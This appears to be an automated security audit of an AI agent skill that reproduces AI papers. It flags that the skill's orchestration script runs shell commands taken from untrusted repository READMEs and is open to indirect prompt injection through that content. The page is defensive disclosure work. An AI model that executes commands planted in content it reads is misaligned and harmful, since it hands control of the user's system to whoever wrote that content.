ai-paper-reproduction

Warn

Audited by Gen Agent Trust Hub on Apr 2, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The orchestration script executes shell commands parsed from external repository README files.
  • Evidence: In scripts/orchestrate_repro.py, the maybe_run_command function uses subprocess.run to execute strings extracted from the target repository's README.
  • [REMOTE_CODE_EXECUTION]: The skill facilitates the execution of third-party code as part of its AI paper reproduction workflow, including scripts from other parts of the skill that are not provided in the current context.
  • Evidence: The workflow defined in SKILL.md and implemented in scripts/orchestrate_repro.py is centered on running code from unverified AI repositories. Additionally, the orchestrator attempts to execute adjacent scripts (scan_repo.py, extract_commands.py, and write_outputs.py) whose contents are missing from the analysis package.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection via the ingestion of untrusted README content which influences system-level actions.
  • Ingestion points: The repository's README.md file is processed in scripts/orchestrate_repro.py to select and run shell commands.
  • Boundary markers: The skill does not employ delimiters or security instructions to isolate untrusted content during parsing or execution.
  • Capability inventory: The orchestration script has access to subprocess.run for system command execution and file system APIs.
  • Sanitization: While shlex.split is used for basic syntactic parsing, the skill performs no semantic validation or filtering of the commands extracted from the untrusted source.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 2, 2026, 05:40 PM